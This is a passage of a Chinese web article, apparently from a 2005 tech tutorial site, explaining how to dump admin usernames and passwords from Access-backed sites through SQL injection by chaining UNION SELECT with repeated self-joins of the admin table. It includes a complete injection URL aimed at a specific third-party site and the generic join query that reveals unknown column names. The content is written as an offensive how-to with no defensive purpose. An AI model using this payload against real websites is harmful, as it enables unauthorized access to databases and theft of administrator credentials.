文章分类 | 推荐文章 | 最新文章 | 热点文章 | 最新软件 | 精品软件 | 下载排行 | 推荐下载 | 免费看大片 | WPS | 杀毒软件
清风网络
首 页 软件下载 网络学院 数码学院
QQ 电脑入门 游戏 操作系统 图形处理 办公软件 媒体动画 精文荟萃 工具软件 网络编程 程序开发 网络技术 认证考试 网站建设 文章专栏
当前位置:清风网络学院网络编程MSSQL直接获取access、SQL Server等数据库数据
精品推荐
特别推荐
·SQL Server企业管理器和查询分析器简介
·常用SQL语句词典
·结束SQL注入隐患3招
·掌握SQL Server数据库的实用技巧
·SQL的简单查询
·快速解决SQL Server“安全疑难”相关问题
·SQL Server 2005:你应知道的13件事
·实例解析:减少SQL日志大小的三个好方法
·使用SQL2000将现有代码作为Web服务提供
·sql server 2000数据库置疑的解决方法
·SQL Server安全问题全攻略之口令
·XP上不能安装MicrosoftSQLSERVER2000吗
·解析Microsoft Sql Server中的like语句
·推荐;适合SQL初学者学习的SQL FAQ集锦
·SQL Server 2005 中的分区表和索引
·查询及删除重复记录的方法大全
·详细介绍优化SQL Server 2000的设置
·关于SQL SERVER 日志满的处理方法
·使用SQL Server 2000索引视图提高性能
·SQL server 2005安装问题汇总
热点TOP10
·巴塞尔新资本协议概述
·详细介绍优化SQL Server 2000的设置
·SQL Server数据库30步检查安全列表
·SQL Server 2005 Express Edition安装步骤详解
·XP上不能安装MicrosoftSQLSERVER2000吗
·SQL server 2005安装问题汇总
·完全讲解 使用MSCS建立SQL Server集群
·SQL Server企业管理器和查询分析器简介
·解决sqlserver2005中文版与vs2005的WebApplicationProject的冲突问题
·[Sql server]DBA的面试题也可以是这样
·SQL Server 2005数据库开发概述(3)
·SQLServer自定义函数:fnSplit
·SQL Server 2005 数据转换服务的常见设计问题
·通过 SQL Server 2005 索引视图提高性能(1)
·这样也行 使用QQ强行视频窥探MM长相
·DOS启动版U盘制作方法详解
·Decryptencryptedstoredprocedures
·SQL Server 2005(32 位)系统要求
·SQL Server关于SQL Agent使用技巧
·触发器对SQL Server数据库进行备份

直接获取access、SQL Server等数据库数据

日期:2005年11月20日 作者: 查看:[大字体 中字体 小字体]


这个站点使用的是access数据库,可以看到能够正常显示出来的字段是2、3、7、8、10、11,而后面的字段却不会显示出来,去掉14,15,16换上*号,页面同样显示出数字,也就是说admin中的字段数是三个,肯定是id username password这种结构,但是除了id字段其他的字段都不能够被猜测出名字。按照在上面SQL Server中所使用的方法移动*号的位置以求能够将敏感数据爆出来,在access中是不可行的。原因是access始终将*好所代替的字段放在查询数据集的最后面。Access查询出来的结果永远都是:1,2,3,4,5,6,7,8,9,10,11,12,13,*这个样子。为了将*好所代替的字段表示出来,我们必须将*所代替的字段移动到其他位置上。先看结果:
http://www.hnp2p.com/mov/view.asp?id=1916%20union%20select%201,*%20from%20(((admin%20as%20a%20inner%20join%20admin%20as%20b%20on%20a.id=b.id)%20inner%20join%20admin%20as%20c%20on%20c.id=b.id)%20inner%20join%20admin%20as%20d%20on%20d.id=c.id)%20inner%20join%20admin%20as%20e%20on%20d.id=e.id
通过这样构造的语句的执行,最终查询得到的数据形式是
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
1,a.id a.name a.pwd b.id b.name b.pwd c.id c.name c.pwd d.id d.name d.pwd e.id e.name e.pwd
其中第3和第7个字段正好就是我们想要得username和password字段的值。这里我使用的是join语法,将两个表连接(相加)起来从而构造得到这样的一个满足我们要求的查询结果。
Join分为全部连接、左连接和右连接,具体区别可以去查看SQL语法。在这里,access中我们不管选择哪一种连接方式效果都等同于全部连接。看一个简单的join语法
SELECT *
FROM (表1 INNER JOIN 表2 ON 表1.序号=表2.序号)
INNER JOIN 表3
ON 表1.序号=表3.序号
转换为实例就是:
select 1,2,3,4,*
from ((admin as a inner join admin as b on a.id=b.id)
inner join admin as c on c.id=b.id)
inner join admin as d on d.id=c.id
按照这种格式就可以把上面的那个url真正执行的SQL语句解出来,无非就是不断的使用join连接数据表admin,然后通过1来补齐前面的字段数目。只要语句构建得当,那么不知道字段名的数据全部都能够在页面中显示出来。这就是这个技术的难点所在了。
好了,全部都介绍完了。如果想把这个技术写成程序的话,也是很有可能的。只不过在语句结构构造的时候最好还是使用人脑吧~~~呵呵

(出处:清风网络学院


上一页 [1] [2] 




上一篇:php 4 和 Php 5 共存新法

下一篇:MRTG(多路由器流量图示器)Windows 2000部署指南

直接获取access、SQL Server等数据库数据 相关文章:
·在PB中如何实现数据模糊查询
·VB+Access设计图书管理系统
·教你如何保证Microsoft Access的安全性
·部署 Microsoft SQL Server 2005 群集
·内网数据库服务器入侵实战
·EasyRecovery 604硬盘数据恢复软件技巧
·突破网盘限制 两招获取Fs2You真实地址
·PowerBuilder数据录入同步显示
·导出数据到Excel概述
·Windows XP中的数据保护和恢复二(组图)
直接获取access、SQL Server等数据库数据 相关软件:
·SQL Server 2000 基础系列课程视频
·winxp sp2 完全优化版 GHO 免刻录直接克隆
·东南大学SQL数据库基础视频教学全42讲 CSF 详见查看
·逐步精通数据库 sql server 视频教程
·CIW Server Administrator
·ACCESS数据库教程 北京大学的ACCESS教程
·SQL/MYSQL/数据库教程专栏
·Access 2000 解密 V2.1.1
·简体中文 Windows 2000 Server 培训教程
·Fast Mail Server V1.8

特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源:http://www.viphot.com
| 帮助(?) | 版权声明 | 友情连接 | 关于我们 | 信息发布
Copyright 2007 www.viphot.com All Rights Reserved. 鄂ICP备05000083号Powered by:viphot